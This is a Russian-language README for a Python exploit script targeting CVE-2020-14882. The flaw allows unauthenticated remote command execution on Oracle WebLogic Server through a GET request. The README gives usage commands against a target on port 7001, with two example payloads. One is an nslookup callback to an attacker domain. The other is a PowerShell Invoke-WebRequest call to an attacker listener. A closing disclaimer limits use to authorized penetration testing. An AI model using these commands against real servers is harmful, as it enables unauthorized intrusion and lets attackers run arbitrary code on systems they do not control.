
Этот скрипт позволяет выполнять удалённый код (RCE) на сервере Oracle WebLogic Server.
Этот скрипт позволяет выполнять удалённый код (RCE) на сервере Oracle WebLogic с помощью неаутентифицированного GET-запроса. Он эксплуатирует уязвимость CVE-2020-14882. Выполняя произвольные команды, злоумышленник может получить несанкционированный доступ к серверу.
Убедитесь, что у вас установлен Python 3. Чтобы использовать этот скрипт, выполните следующие действия:
Откройте терминал или командную строку.
Запустите скрипт с помощью следующей команды:
python3 exploit.py http(s)://target:7001 command
Замените http(s)://target:7001 на целевой URL сервера Oracle WebLogic, а command — на желаемую команду для выполнения.
Пример 1:
python3 exploit.py http(s)://target:7001 "nslookup your_Domain"
Этот пример выполняет команду nslookup your_Domain на целевом сервере.
Пример 2:
python3 exploit.py http(s)://target:7001 "powershell.exe -c Invoke-WebRequest -Uri http://your_listener"
Этот пример выполняет команду PowerShell Invoke-WebRequest -Uri http://your_listener на целевом сервере.
Этот скрипт предназначен только для авторизованного тестирования на проникновение и исследований в области безопасности. Несанкционированное использование этого скрипта для эксплуатации систем без соответствующего согласия незаконно и может повлечь юридические последствия. Используйте его на свой страх и риск.
Этот скрипт требует следующие зависимости:
requestsurllib3Пожалуйста, убедитесь, что эти зависимости установлены перед запуском скрипта.